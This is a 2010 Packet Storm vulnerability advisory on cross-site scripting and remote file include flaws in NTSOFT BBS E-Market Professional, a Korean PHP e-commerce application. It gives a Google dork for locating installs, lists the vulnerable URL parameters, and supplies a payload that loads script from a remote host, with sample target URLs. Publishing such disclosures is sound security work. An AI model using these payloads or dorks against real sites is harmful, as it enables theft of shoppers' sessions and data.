NTSOFT BBS E-Market Professional Cross Site Scripting

2010-07-06T00:00:00
ID PACKETSTORM:91482
Type packetstorm
Reporter Ivan Sanchez
Modified 2010-07-06T00:00:00

Description

                                        
                                            `+================================================================================================+  
+ NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code +  
+================================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: NTSOFT, All Right Reserved.  
  
Vendor Overview: NTSOFT. (Korean ecommerce application)  
  
Vendor Homepage: http://www.nt.co.kr/  
  
  
  
Date: 03/07/2010  
  
  
"most off all korean sites that handle e-shop , e-banking,... use this software"  
  
  
Description:  
------------  
  
BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.  
  
BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.   
The issue presents itself due to improper validation of user-supplied data.   
  
  
  
  
During 2009, I reported some bugs:  
----------------------------------  
  
http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt  
  
http://www.securityfocus.com/bid/35893   
  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152  
  
http://xforce.iss.net/xforce/xfdb/52157  
  
http://secunia.com/advisories/26117  
  
http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html  
  
  
  
GOOGLE DORKS:  
------------  
  
intext: "NTSOFT All rights reserved"  
  
  
  
Parameters affected:  
  
-------------------  
  
2010:  
  
pageurl= evil.js  
co_no= evil.js  
b_temcode= evil.js  
  
  
  
2009:  
  
page= evil.js  
bt_code= evil.js  
b_no= evil.js  
  
  
  
  
  
  
Evil Code to put:  
-----------------  
  
Example: "><script src=http://site/scripts/evil.js></script>   
  
  
  
  
Example URl affected:  
---------------------  
  
  
2009:  
  
http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code  
  
  
  
2010:  
  
http://TARGET/becommunity/community/index.php?pageurl= EVIL_CODE  
  
  
http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=EVIL_CODE  
  
  
http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=EVIL_CODE &co_no=105580  
  
  
http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=EVIL_CODEE&page=7&flg=3&co_no=105580  
  
  
  
  
  
Thank you so Much! Ivan,  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
  
+================================================================================================+  
+ NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code +  
+================================================================================================+  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`